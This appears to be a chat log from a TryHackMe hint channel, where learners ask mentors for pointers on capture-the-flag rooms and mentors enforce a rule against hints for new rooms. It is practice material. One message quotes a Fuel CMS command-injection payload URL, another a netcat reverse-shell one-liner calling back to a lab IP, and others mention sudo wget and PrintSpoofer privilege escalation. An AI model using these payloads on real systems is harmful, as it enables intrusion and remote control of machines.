@white salmon either use burp, zap or network tap in browser to capture the login request .

Hello guy 🙂 I'm on the room Wgel CTF, and I have to get the root flag or acces but I'm stuck on it , some one maybe can "hint me ^^ "

I got that I have the sudo acces with the wget but still

https://gtfobins.github.io/gtfobins/wget/

@stuck fractal yes I saw that , and I saw on some website to I can upload the root file with NC but 1. I don't understand who the people know the name od the file ( because you can't LS the folder) and even with that , is still doesn't work for me

you have wget, not netcat

right?

yes , it's right

but I have to send the file to a server , that why I create a simpleHTTP server with Python but is doesn't accept the POST request

can i dm some1 about gamingserver i think i got unintended way to root

@limber bane

Yeah

https://tenor.com/view/rickandmorty-showme-gif-7658980

i also want to know 🙂

T'was intended

and why it showing This room is 35 days old

@stuck fractal I think I got it !! thanks for help !

and why it showing This room is 35 days old
@keen willow Creation date vs release date

hi all, im on the linux challenges, task 3 linux functionality. still missing flag 15. Can you find information about the system, such as the kernel version etc.
Find flag 15.

ive tried uname an dmesg

Check the hint on the question

well, a bit of misleading then 🙂 , for me lol

well, a bit of misleading then 🙂 , for me lol
@keen willow It's being changed, normally the date is reset when it's released

better then:)

can i dm some1 about gamingserver i think i got unintended way to root
@solid patrol what you got ?

u can dm me ,i dont wanna say it here

the hint says "*release" im afraid it wasnt much help to me.

@verbal barn That's a valid pattern for a file

See what you can find

oooh ty

@trail trail Hey, as that's a new room can you wait a couple days before asking please?

Oh sorry I didn't know!

I'll remove the comment, is that ok?

Yes

Thank you 😅

Hello

Could someone help me?

Maybe

We don't know yet

Haha true 😀

Sorry.

So I am new to linux and stuff and I was doing the Linux Room, Im on task 12

Learn Linux?

Yeah.

And the question is like.. really difficult for me

I was wondering if you could tell me how i could figure it out?

It's asking, for su specifically, how do you specify what shell is used

So I'd recommend reading the manual for su

Ah ok

Thank you!

You'll get a long way by reading manuals and help pages

yeah my friend told me that the manual is basically my best friend

manuals + google + help pages first

Then ask here

Okay, Thanks for the help.

Ill keep that in mind next time before jumping straight to discord help 😄

hi, can somebody help me with this question: What kind of protocol is TCP?. i still trying, and i saw the hint for it, but idk what word use to complete it (i already google it) room: Introductory Networking. help plz

It's in the text

Read back through it

||i already used transport protocol||

🙂

and transfer too

My hint still applies

really ?

ok

ill keep trying

already used transmission it isnt

idk

Keep reading

It's in there

mm

ok

i know that its a transmission protocol, but idk how to put it right

That's not what it's looking for

Keep reading the text of the task

omg

it was there

in cursive in fact

xD

Now do you understand why I kept telling you to read it?

above

i do i do

thx

Need some help in relevant. Maybe its a dumb question but I want to understand I can get printspoofer.exe
I am not very good with Visual Studio and Cpp projects

Do I need to clone the repo and use VS to build and create exe ?

Mayor has one pre compiled

Do you know where can I find it ?

Mayors GitHub

Thanks

https://github.com/dievus?tab=repositories

Appreciate it 🙂

@restive aspen Why do you think you need to attack the webserver?

I don't know...

I recommend doing Network Services first

And some other rooms to get the basics of the enumeration that you need here

Okay! I'll do

oh it's a room for subscribers

I think I will search for "knowledge" on Youtube

Basic Pentesting relies on you already knowing how to use certain tools

Yeah, I guess I need the Learning Path to know what I should learn first

I learn every room that is "free"

You can filter on search

Thanks

I think this room may help me

Try it.

will do

Hi so in learn linux im on task 43 and I took notes regarding the entire room and the key points till its just known knowledge but how would i start to get in there

im not entirely sure where to start with the entire thing

users typically create files in their home directory

Look for out of place files

okay ill start there thanks

think i found it, thanks

Hey, congrats!

Thanks for all the help youve given the past few days

Should I use nmap -sT all the time?

or -sS

That's a #general question really

I don't know when to use them

lol

It's not related to a specific room

imma ask there

Currently on CCPentesting room

Task 4

What wordlist should I use to solve this question?

Something sensible for file or directory names

IE not a password list

Will this work/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Should do

thanks

Try it and see

It's related to metasploit

I can't find it in -h

Can someone help me out?

Did you try to search on google?

yes

But can't find the answetr

Solved

@restive aspen Please don't post answers.

I'm sorry

can i for this hint i already an hour dont find it

in burp suite room

Resd the text for the task

i still dont get it can i have a piece sorry i got wrong room ... for ask

It's in the text for the task

yea i got it thanks james...

hehe my bad

I need a hint for gamingserver as I tried the hidden file but, something ain't right.

Hey, as that's a new room please wait a couple days before asking for hints.

oh sure

Hey im on ignite and im trying to get my fuel RCE to work i seem to be getting errors in python or maybe even the code its self (I did change the ip in the exploit)

Traceback (most recent call last):
File "47138.py", line 26, in <module>
r = requests.get(burp0_url, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 76, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 530, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 643, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 510, in send
raise ProxyError(e, request=request)
requests.exceptions.ProxyError: HTTPConnectionPool(host='127.0.0.1', port=8080): Max retries exceeded with url: http://10.10.84.246:8080//fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('"ls"')%2B' (Caused by ProxyError('Cannot connect to proxy.', NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f2f8f6a56d0>: Failed to establish a new connection: [Errno 111] Connection refused',)))

The exploit expects you to have a proxy

Like burp

ahhhhhhh!!!! damn me

You can fix the exploit to not require that

Got it

You can fix the exploit to not require that
@stuck fractal Would i change the address of proxy = {"http":"http://127.0.0.1:80"}

Nope

Or create a listener there

Just start burp

Disable intercept

Ok so i enabled burp proxy, allowed me to get the exploit to run im assuming because burp runs on 127.0.0.1:8080 and thats what was in the exploit code?
When i do cmd:"ls"

I just get html

im trying to run
"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4444 >/tmp/f"

To open a nc

I think your output should be at the top before most of the HTML

<h4>A PHP Error was encountered</h4>

<p>Severity: Warning</p>
<p>Message: preg_match(): Delimiter must not be alphanumeric or backslash</p>
<p>Filename: controllers/Pages.php(924) : runtime-created function</p>
<p>Line Number: 1</p>
<h4>A PHP Error was encountered</h4>

hmmmmm

I will keep trying i think im missing something small

omg lol yes the output was at the top! all good

Thanks for the help

I have just completed GamingServer room and I am wondering if there's anyone solved it with two ways? because as @solid patrol said above this method might be unintended.

@brazen yew dm

hi i want to ask

for hint

Let Sequencer run and collect ~10,000 requests. Once it hits roughly that amount hit 'Pause' and then 'Analyze now'

~10.000 is we scan at last 10.000 or what because when i analyze the live sequencer its take too long

any advice

I have just completed GamingServer room and I am wondering if there's anyone solved it with two ways? because as @solid patrol said above this method might be unintended.
@chrome heron so you didnt use the method mentioned by @solid patrol ?

@keen willow don't know what method he used that's why :(, can't post anything here, so if anyone solved we can discuss the different methods

Hi ! i am suck with XXE challlenge

How many users are on the system?

anyone can u give me some hints?

i dont think hints for theseus are allowed yet ?

Hi guys, someone doing or has done GamingServer? I am stuck in a point, I know what is the solution but I am doing something wrong.

Hi guys, someone doing or has done GamingServer? I am stuck in a point, I know what is the solution but I am doing something wrong.
@white salmon dm me.

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@white salmon @keen willow

i dont think hints for theseus are allowed yet ?
@keen willow No, they're not

^ please wait a little while longer out of respect for the creator (: gl hf!

Especially GamingServer which literally came out very late last nights

@keen willow No, they're not
@limber bane Can I pm you about one of your rooms? I have already completed it

Ye

hi guys, as i forgot that gameserver is a new room and apologies for that, thanks @trim haven and @steady stratus for reminding me that. I am respecting that so do not dm me for that room. and try hard. 🙂

Thanks :pp

@limber bane Can i dm you for a room hint on a room you recently made? "https://tryhackme.com/room/gamingserver"

😆 😆

😆 😆
@keen willow am i a joke to you :p

Platinum balls move

?

ow js c*t i didn't read the above question. mybad sorry

@limber bane Can i dm you for a room hint on a room you recently made? "https://tryhackme.com/room/gamingserver"
@white salmon Ye, assuming you've put a good attempt into it first

@white salmon Ye, assuming you've put a good attempt into it first
@limber bane Im already on it for one or two days

dont worry, i know this is happenning in lockdown 🙂

Hehe no worries @keen willow (:

@limber bane can I dm you? I want to make sure I used the intended path to root on gamingserver.

Yes you did

Where would I continue now? I've come to getting the user flag but not sure where to look now.

Room : GamingServer

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

I have done a linpeas scan I cannot check if I got sudo perms. But I can't see where to continue the linpeas scan didnt really give me anything that stand out.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

Sorry :/

Ohh, Sorry!

how to i be root user in GamingServer

any hints

@worn kite gamingserver is a brand new box. Usually there won’t be hints for several days after a box is released.

ohh , what does boot2root mean

i did a google serach , it was just filled with challenges

@worn kite means that it just boots and you need to root it simple as that

ohh , noice ,thanks

@limber bane Is it OK if I DM you about Gaming Server? I have spent a solid 6 hours staring at the same thing...

Anyone up this morning who finished GamingServer yet. Had to pause last night after getting user flag. Stuck on priv esc.

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

No help yet

I just submitted my GamingServer writeup, once the required time has passed and it gets accepted those of you who are stucked will be able to advance

hi guys

hiya, just ask if you have something you want a hint on

if youre just saying hi then #general

someone is working literelly hard to to maintain hygine in channel 👍

i need hint if gaming server

of *

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

i got ||ssh password,|| but i think wtf is ~~||username||~

It's a new room. Please stop asking for hints or help. Rule 13 applies here. @buoyant hatch

k

i have a question about running files on Mr Robot

when i run linpeas

it shuts down

i have a question about running files on Mr Robot
@foggy blaze a screenshot might help.

i see you run cat x.txt and you got out of machine, is it?

yes

but nvm

i got root

thanks anyways

cool then 🙂

ok, so,i need help with this room https://tryhackme.com/room/vulnversity, i'm stuck at Task 4 #3 why every extension is working :

Check your payload encoding

But 200 is an OK

It's a HTTP status code

Uploading the wrong file type is not a HTTP error

oh

Hello, I don't understand what I need to send to the task 3 question 1 of this room : https://tryhackme.com/room/owaspjuiceshop

The flag

Okay I think i found it, I just didn't see it when I connected x) Thanks

hey so im in new room " Gaming server " as i dont much yet . i have manged to get into ssh and got the user flag but now i have no idea whatsoever how to get the root flag as i dont know the password of current user and sudo

how do i get root access?

any clues?

I think no hints are allowed for Gaming Server.

Can't help it's a new room

oh

they call it rule 13

yea

is this like a rule for new room o

oh

Yup.

have to give it a few days before ppl can help with those 😉

gotta keep it competitive

that's a good way to make ppl push themselves a little harder

no clues or anything ? :p

Nope!

ah ok

yeah, no nothing. I'm even trying to keep myself from talking about anything in detail, despite being stuck in it too 😄

oh ;-;

fun room though 😄

suggest some similar difficult room ?

thanks everyone

try Wgel CTF

thanks @white salmon

I'm trying steel mountain. Both metasploit and python exploits doesn't work. Is there any I can reach out?

new room. you'll have to wait or keep trying on your own

Please come back in a couple days or so

Spoilers 😭

Hello, it's me again ^^
https://tryhackme.com/room/owaspjuiceshop
On owasp juice shop I can't change my ip (task 7 question 2)

any idea / hint ?

@slim mauve you don't have to change your IP

is it possible sudo needs a different password than ssh? becouse I am able to log into the machine using a password that sudo tells me is incorrect.

@jovial venture Hey, like we said before please come back in a couple days or so

this question is not bound to this specific room

Then it doesn't go here

oh

sorry

ok, so,i need help with this room https://tryhackme.com/room/vulnversity, i'm stuck at Task 4 #3 why every extension is working, my payloads are good but idk how to see which extension is good and idk to see other request bcs i only see http request :

You need to check your payload encoding

And switch it to whatever setting it isn't RN

Then the length will be different

i need to change this ?

Yes

Try it on and off

already tried but don't change anything 😦

One will give different response lengths for one payload

ohhh

ok thx

Vulnversity Walkthrough task 5 help , I don't know how to get Linpeas on the server

Copying files to and from target machines is a super fundamental skill

SCP, HTTP, FTP, SMB, Netcat

There's loads of ways

ive set up the reverse shell but when I try to do wget or curl it says connection timed out

Then you are not doing it correctly.

The room machines don't have outside internet connection fyi

you won't be able to wget or curl any website on the internet

But you can wget or curl from a HTTP server set up on your own machine (usually the attacker machine that is running the VPN)

thanks will try

I still get a connection refused error

@slim mauve you don't have to change your IP
@rapid flower I meant the last connection IP of the account (the goal of the question ^^)

I still get a connection refused error
@rustic meteor Then whatever you're trying to connect to doesn't have a service listening

You can't connect to something that doesn't exist

I set up a local http server with python but on my compromised shell I cant reach it

If you'd like some help, showing us what you're doing would be great

my local http

Do you understand what 0.0.0.0 means?

local host ?

0.0.0.0 means all interfaces

So your attacking machine is serving HTTP on all interfaces on port 80

But your curl request from the target isn't talking to your attacking machine

so I need to curl http://10.10.166.224

With the correct port and path, if that's the IP of your attacking machine

thanks a lot will try this out

hey lads

can someone figure out what I'm doing wrong in the metasploit room?

yea whats up

I keep trying to run the exploit but no session is created

I've messed around with it for a while but I can't get it working

show options and screenshot please

sec

I just started using Linux and I'm not sure how to take a screenshot

no worries

Printscreen works

there we go

@oblique cliff You want this one?

lol sure

Pog

@white salmon That IP address it's set to is your VirtualBox NAT IP address. It needs to be your VPN IP, which is your tun0 IP address

Isn't setting LHOST to tun0 correct?

depending on when you set it, it may not stick

ooh, worked

so, yes, its correct, but you probably did it before selecting the module or before the payload was selected and so it didnt set it properly

thanks man, I Just used ip addr

😉

cuz metasploit is stupid stuff happens

no prob 🙂

anyone done the new room: https://tryhackme.com/room/gamingserver

alright, I accidentally quit the meterpreter and now it's not creating a session again 😭

@dark plover

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@white salmon Terminate the target and deploy it again

ah, alright

will try

@oblique cliff i understand, so no nudges or hints will be given as it is newly released 🙂 ?

yep

until suitguy OK's it

@dark plover i am stuck at priv esc, gained access and userflaf

any sort of hint how to priv esc ? if not , understandable cause its new!

Mr Robot CTF. Task 2 ofc. Where are the keys. Hints?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

@fickle solstice

@brisk hedge as you said, its new, so not for a bit 🙂

Aight;
Dunno if someone doesn't wanna see this but imma spoiler tag it to be sure.

||I've scanned the machine, found http, searched it, found a weird ass talking terminal. Saw whoismrrobot.com, searched it, and again, loads of fucking information, went through it all and found whoismrrobot.com/exit and whoismrrobot.com/endgame. Completed those games (with a quick search and walkthrough from reddit), and now I'm lost. Do I need to look through those folders with weird pics and pdfs again? Or is it somewhere else||

Oh yeah, I forgot
||Found a werid pattern, whoismrrobot.com/pattern. Dunno what to do with this information||

You shouldn't be touching anything outside of THM for that

lol

I just went around the whole web for this

Bet my computer is all full packed with tojan horses

Maybe a little less cursing please? This is an educational platform

hehe pardon me

So how do I find those keys?

The keys are like flags in a typical CTF

yeah yeah, but do you got a hint

writeups

huh?

writeups
@tawdry tangle Not yet. That's why this is the hints channel

xd

u can still get some form of hint from writeups

...the point of this channel is not to push people to writeups for hints. It's to ask for a hint.

think i found something. In origin>history>notes>rwb.gif you see bottom right corner six, page 4.
In EC_NY>Documents>Employee Forms.pdf, page 4, row 6, you see office floor.
In the same machine, documents you see ground_floor.jpg and from that photo I don't really get any further

You want the website on the THM box

Everything is contained there

what do you really mean

I'm connected to the vpn

and deployed the machine

Yes

That machine runs a webserver

That webserver is all you need

Don't go to other sites

so whoismrrobot.com shouldnt i go to?

You shouldn't be touching anything outside of THM for that

That machine runs a webserver
That webserver is all you need

lol ok

but the webserver only has a number of commands. And they're all to videos. Are the keys shown in the videos?

That webserver is all you need

bruh

ur a keeper

You asked for a hint